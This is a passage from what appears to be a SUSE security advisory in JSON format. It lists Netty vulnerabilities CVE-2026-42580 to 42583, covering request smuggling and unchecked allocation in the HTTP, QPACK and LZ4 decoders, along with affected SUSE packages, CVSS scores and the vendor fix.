"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42580"
},
{
"cve": "CVE-2026-42581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42581"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42581",
"url": "https://www.suse.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "SUSE Bug 1265277 for CVE-2026-42581",
"url": "https://bugzilla.suse.com/1265277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42582",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42582"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42582",
"url": "https://www.suse.com/security/cve/CVE-2026-42582"
},
{
"category": "external",
"summary": "SUSE Bug 1265318 for CVE-2026-42582",
"url": "https://bugzilla.suse.com/1265318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42582"
},
{
"cve": "CVE-2026-42583",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42583"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
